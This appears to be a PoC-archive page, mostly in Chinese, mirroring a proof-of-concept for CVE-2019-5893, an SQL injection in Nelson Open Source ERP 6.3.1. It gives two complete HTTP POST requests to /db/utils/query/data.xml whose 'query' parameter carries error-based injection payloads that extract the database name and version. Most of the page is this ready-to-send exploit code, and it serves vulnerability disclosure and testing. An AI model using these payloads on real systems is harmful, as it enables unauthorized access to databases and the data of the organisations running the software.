POC详情: 951114bf6833bb699a56fb6312f279fc9dd3d0a8

来源
关联漏洞
标题: Nelson Open Source ERP SQL注入漏洞 (CVE-2019-5893)
描述:Nelson Open Source ERP是一套开源的ERP(企业资源计划)系统。该系统包括订单管理、文件管理、财务管理和库存管理等。 Nelson Open Source ERP 6.3.1版本中的db/utils/query/data.xml页面存在SQL注入漏洞。远程攻击者可借助‘query’参数利用该漏洞执行SQL命令。
描述
CVE-2019-5893 | OpenSource ERP application has SQL Injection vulnerability.
介绍
# OpenSource-ERP-SQL-Injection
[OpenSource ERP](http://www.nelson-it.ch/) application has SQL Injection vulnerability.

## CVE-2019-5893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5893

https://www.exploit-db.com/exploits/46118

# PoC - Get DB name
```
POST /db/utils/query/data.xml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://172.16.118.142:8024
Referer: http://172.16.118.142:8024/
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Cookie: MneHttpSessionId8024=15471285865828
Host: 172.16.118.142:8024
Content-Length: 423
Accept-Encoding: gzip, deflate
Connection: close

sqlend=1&query=%27%7c%7ccast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7c(SELECT+current_database())%7c%7cchr(95)%7c%7cchr(33)%7c%7cchr(64))+as+numeric)%7c%7c%27&schema=mne_application&table=userpref&cols=startweblet%2cregion%2cmslanguage%2cusername%2cloginname%2cpersonid%2clanguage%2cregionselect%2ctimezone%2ccountrycarcode%2cstylename%2cusername%2cstartwebletname&usernameInput.old=session_user&mneuserloginname=test
```
![alt tag](https://emreovunc.com/blog/en/OpenERP-SQL-DBname.png)

# PoC - Get DB version
```
POST /db/utils/query/data.xml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://172.16.118.142:8024
Referer: http://172.16.118.142:8024/
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Cookie: MneHttpSessionId8024=15471285865828
Host: 172.16.118.142:8024
Content-Length: 414
Accept-Encoding: gzip, deflate
Connection: close

sqlend=1&query=%27%7c%7ccast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7c(SELECT+VERSION())%7c%7cchr(95)%7c%7cchr(33)%7c%7cchr(64))+as+numeric)%7c%7c%27&schema=mne_application&table=userpref&cols=startweblet%2cregion%2cmslanguage%2cusername%2cloginname%2cpersonid%2clanguage%2cregionselect%2ctimezone%2ccountrycarcode%2cstylename%2cusername%2cstartwebletname&usernameInput.old=session_user&mneuserloginname=test
```
![alt tag](https://emreovunc.com/blog/en/OpenERP-SQL-DBversion.png)
文件快照

[4.0K] /data/pocs/951114bf6833bb699a56fb6312f279fc9dd3d0a8 ├── [ 917] PoC-Request-1 ├── [ 926] PoC-Request-2 └── [2.2K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。